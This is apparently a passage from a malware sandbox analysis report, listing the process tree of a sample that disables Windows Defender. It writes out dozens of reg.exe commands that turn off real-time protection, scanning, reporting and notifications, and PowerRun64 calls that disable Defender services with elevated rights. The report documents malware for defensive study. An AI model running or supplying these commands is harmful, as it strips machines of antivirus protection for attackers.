  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "PurgeItemsAfterDelay" /t reg_DWORD /d "0" /f
  2⤵
  PID:2640
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "LocalSettingOverridePurgeItemsAfterDelay" /t reg_DWORD /d "0" /f
  2⤵
  PID:2660
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t reg_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  PID:2680
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t reg_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  PID:2728
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t reg_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  PID:2512
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRoutinelyTakingAction" /t reg_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  PID:3064
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t reg_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  PID:2880
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScriptScanning" /t reg_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  PID:2460
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t reg_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  PID:2300
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v "Scan_ScheduleDay" /t reg_DWORD /d "8" /f
  2⤵
  PID:1976
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v "Scan_ScheduleTime" /t reg_DWORD /d 0 /f
  2⤵
  PID:636
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "AdditionalActionTimeOut" /t reg_DWORD /d 0 /f
  2⤵
  PID:2924
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "CriticalFailureTimeOut" /t reg_DWORD /d 0 /f
  2⤵
  PID:1508
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "NonCriticalTimeOut" /t reg_DWORD /d 0 /f
  2⤵
  PID:564
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "DisableGenericRePorts" /t reg_DWORD /d 1 /f
  2⤵
  PID:1660
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t reg_DWORD /d "1" /f
  2⤵
  PID:108
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "AvgCPULoadFactor" /t reg_DWORD /d "10" /f
  2⤵
  PID:2964
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableArchiveScanning" /t reg_DWORD /d "1" /f
  2⤵
  PID:2960
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableCatchupFullScan" /t reg_DWORD /d "1" /f
  2⤵
  PID:2212
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableCatchupQuickScan" /t reg_DWORD /d "1" /f
  2⤵
  PID:2856
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableRemovableDriveScanning" /t reg_DWORD /d "1" /f
  2⤵
  PID:2240
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableRestorePoint" /t reg_DWORD /d "1" /f
  2⤵
  PID:3052
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableScanningMappedNetworkDrivesForFullScan" /t reg_DWORD /d "1" /f
  2⤵
  PID:1652
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableScanningNetworkFiles" /t reg_DWORD /d "1" /f
  2⤵
  PID:588
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "PurgeItemsAfterDelay" /t reg_DWORD /d 0 /f
  2⤵
  PID:2828
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScheduleDay" /t reg_DWORD /d 8 /f
  2⤵
  PID:2932
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScheduleTime" /t reg_DWORD /d 0 /f
  2⤵
  PID:2904
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScanOnlyIfIdle" /t reg_DWORD /d 0 /f
  2⤵
  PID:2676
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScanParameters" /t reg_DWORD /d 0 /f
  2⤵
  PID:2928
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" /v "FirstAuGracePeriod" /t reg_DWORD /d "0" /f
  2⤵
  PID:2304
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v "DisableUpdateOnStartupWithoutEngine" /t reg_DWORD /d 1 /f
  2⤵
  PID:2244
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v "ScheduleDay" /t reg_DWORD /d 8 /f
  2⤵
  PID:540
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v "ScheduleTime" /t reg_DWORD /d 0 /f
  2⤵
  PID:704
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v "SignatureUpdateCatchupInterval" /t reg_DWORD /d 0 /f
  2⤵
  PID:472
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SmartScreen" /v "ConfigureAppInstallControl" /t reg_SZ /d "Anywhere" /f
  2⤵
  PID:264
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SmartScreen" /v "ConfigureAppInstallControlEnabled" /t REG_DWORD /d 1 /f
  2⤵
  PID:2596
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t reg_DWORD /d "1" /f
  2⤵
  PID:2784
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t reg_DWORD /d "0" /f
  2⤵
  PID:2708
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReportingLocation" /t reg_MULTI_SZ /d "0" /f
  2⤵
  PID:1492
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t reg_DWORD /d "2" /f
  2⤵
  PID:1128
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "LocalSettingOverrideSpynetReporting" /t reg_DWORD /d 0 /f
  2⤵
  PID:1828
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Systray" /v "HideSystray" /t reg_DWORD /d "1" /f
  2⤵
  PID:312
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t reg_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender notification settings
  PID:2492
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications" /t reg_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender notification settings
  PID:1608
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /t reg_BINARY /d "030000000000000000000000" /f
  2⤵
  PID:1648
- C:\Users\Admin\AppData\Local\Temp\$_32_\PowerRun64.exe
  PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2440
- - C:\Users\Admin\AppData\Local\Temp\$_32_\PowerRun64.exe
    "C:\Users\Admin\AppData\Local\Temp\$_32_\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2416
  - - C:\Users\Admin\AppData\Local\Temp\$_32_\PowerRun64.exe
      "C:\Users\Admin\AppData\Local\Temp\$_32_\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:1316
    - - C:\Windows\System32\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f
        5⤵
        
        PID:572
- C:\Users\Admin\AppData\Local\Temp\$_32_\PowerRun64.exe
  PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2308
- - C:\Users\Admin\AppData\Local\Temp\$_32_\PowerRun64.exe
    "C:\Users\Admin\AppData\Local\Temp\$_32_\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2228
  - - C:\Users\Admin\AppData\Local\Temp\$_32_\PowerRun64.exe
      "C:\Users\Admin\AppData\Local\Temp\$_32_\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:2376
    - - C:\Windows\System32\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f
        5⤵
        
        PID:1700
- C:\Users\Admin\AppData\Local\Temp\$_32_\PowerRun64.exe
  PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2128
- - C:\Users\Admin\AppData\Local\Temp\$_32_\PowerRun64.exe
    "C:\Users\Admin\AppData\Local\Temp\$_32_\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1044
  - - C:\Users\Admin\AppData\Local\Temp\$_32_\PowerRun64.exe
      "C:\Users\Admin\AppData\Local\Temp\$_32_\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:2588
    - - C:\Windows\System32\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f
        5⤵
        
        PID:1784
- C:\Users\Admin\AppData\Local\Temp\$_32_\PowerRun64.exe
  PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3012
- - C:\Users\Admin\AppData\Local\Temp\$_32_\PowerRun64.exe
    "C:\Users\Admin\AppData\Local\Temp\$_32_\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2068
  - - C:\Users\Admin\AppData\Local\Temp\$_32_\PowerRun64.exe
      "C:\Users\Admin\AppData\Local\Temp\$_32_\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:1520
    - - C:\Windows\System32\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f
        5⤵
        
        PID:288
- C:\Users\Admin\AppData\Local\Temp\$_32_\PowerRun64.exe
  PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1284
- - C:\Users\Admin\AppData\Local\Temp\$_32_\PowerRun64.exe
    "C:\Users\Admin\AppData\Local\Temp\$_32_\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1620
  - - C:\Users\Admin\AppData\Local\Temp\$_32_\PowerRun64.exe
      "C:\Users\Admin\AppData\Local\Temp\$_32_\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:1576
    - - C:\Windows\System32\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f
        5⤵
        
        PID:2448
- C:\Users\Admin\AppData\Local\Temp\$_32_\PowerRun64.exe
  PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1868
- - C:\Users\Admin\AppData\Local\Temp\$_32_\PowerRun64.exe
    "C:\Users\Admin\AppData\Local\Temp\$_32_\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:2136
  - - C:\Users\Admin\AppData\Local\Temp\$_32_\PowerRun64.exe
      "C:\Users\Admin\AppData\Local\Temp\$_32_\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:2604
    - - C:\Windows\System32\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f
        5⤵
        Modifies security service
        
        PID:588
- C:\Users\Admin\AppData\Local\Temp\$_32_\PowerRun64.exe
  PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2764
- - C:\Users\Admin\AppData\Local\Temp\$_32_\PowerRun64.exe
    "C:\Users\Admin\AppData\Local\Temp\$_32_\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:2984
  - - C:\Users\Admin\AppData\Local\Temp\$_32_\PowerRun64.exe
      "C:\Users\Admin\AppData\Local\Temp\$_32_\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:2504
    - - C:\Windows\System32\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f
        5⤵
        Modifies security service
        
        PID:920
- C:\Users\Admin\AppData\Local\Temp\$_32_\PowerRun64.exe
  PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2836
- - C:\Users\Admin\AppData\Local\Temp\$_32_\PowerRun64.exe
    "C:\Users\Admin\AppData\Local\Temp\$_32_\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:2956
  - - C:\Users\Admin\AppData\Local\Temp\$_32_\PowerRun64.exe
      "C:\Users\Admin\AppData\Local\Temp\$_32_\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:324
    - - C:\Windows\System32\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f
        5⤵
        
        PID:2104
- C:\Users\Admin\AppData\Local\Temp\$_32_\PowerRun64.exe
  PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2744
- - C:\Users\Admin\AppData\Local\Temp\$_32_\PowerRun64.exe
    "C:\Users\Admin\AppData\Local\Temp\$_32_\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:3056
  - - C:\Users\Admin\AppData\Local\Temp\$_32_\PowerRun64.exe
      "C:\Users\Admin\AppData\Local\Temp\$_32_\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:1652
    - - C:\Windows\System32\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f
        5⤵
        
        PID:1160
- C:\Users\Admin\AppData\Local\Temp\$_32_\PowerRun64.exe
  PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:564
- - C:\Users\Admin\AppData\Local\Temp\$_32_\PowerRun64.exe
    "C:\Users\Admin\AppData\Local\Temp\$_32_\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:1280
  - - C:\Users\Admin\AppData\Local\Temp\$_32_\PowerRun64.exe
      "C:\Users\Admin\AppData\Local\Temp\$_32_\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:1956
    - - C:\Windows\System32\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f
        5⤵
        
        PID:2588
- C:\Users\Admin\AppData\Local\Temp\$_32_\PowerRun64.exe
  PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1704
- - C:\Users\Admin\AppData\Local\Temp\$_32_\PowerRun64.exe
    "C:\Users\Admin\AppData\Local\Temp\$_32_\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:768
  - - C:\Users\Admin\AppData\Local\Temp\$_32_\PowerRun64.exe
      "C:\Users\Admin\AppData\Local\Temp\$_32_\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:1824
    - - C:\Windows\System32\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f
        5⤵
        
        PID:3032
- C:\Users\Admin\AppData\Local\Temp\$_32_\PowerRun64.exe
  PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2592
- - C:\Users\Admin\AppData\Local\Temp\$_32_\PowerRun64.exe
    "C:\Users\Admin\AppData\Local\Temp\$_32_\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:1816
  - - C:\Users\Admin\AppData\Local\Temp\$_32_\PowerRun64.exe
      "C:\Users\Admin\AppData\Local\Temp\$_32_\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:2380
    - - C:\Windows\System32\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f
        5⤵
        
        PID:2644
- C:\Users\Admin\AppData\Local\Temp\$_32_\PowerRun64.exe
  PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1708
- - C:\Users\Admin\AppData\Local\Temp\$_32_\PowerRun64.exe
    "C:\Users\Admin\AppData\Local\Temp\$_32_\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:1032
  - - C:\Users\Admin\AppData\Local\Temp\$_32_\PowerRun64.exe
      "C:\Users\Admin\AppData\Local\Temp\$_32_\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:2724
    - - C:\Windows\System32\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f
        5⤵
        
        PID:2756
- C:\Users\Admin\AppData\Local\Temp\$_32_\PowerRun64.exe
  PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1588
- - C:\Users\Admin\AppData\Local\Temp\$_32_\PowerRun64.exe
    "C:\Users\Admin\AppData\Local\Temp\$_32_\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:2448
  - - C:\Users\Admin\AppData\Local\Temp\$_32_\PowerRun64.exe
      "C:\Users\Admin\AppData\Local\Temp\$_32_\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:1992
    - - C:\Windows\System32\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f
        5⤵
        Modifies security service
        
        PID:1660
- C:\Users\Admin\AppData\Local\Temp\$_32_\PowerRun64.exe
  PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2748
- - C:\Users\Admin\AppData\Local\Temp\$_32_\PowerRun64.exe
    "C:\Users\Admin\AppData\Local\Temp\$_32_\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:2684
  - - C:\Users\Admin\AppData\Local\Temp\$_32_\PowerRun64.exe
      "C:\Users\Admin\AppData\Local\Temp\$_32_\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:328
    - - C:\Windows\System32\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f
        5⤵
        Modifies security service
        
        PID:1244
- C:\Users\Admin\AppData\Local\Temp\$_32_\PowerRun64.exe
  PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2300
- - C:\Users\Admin\AppData\Local\Temp\$_32_\PowerRun64.exe
    "C:\Users\Admin\AppData\Local\Temp\$_32_\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f
    3⤵
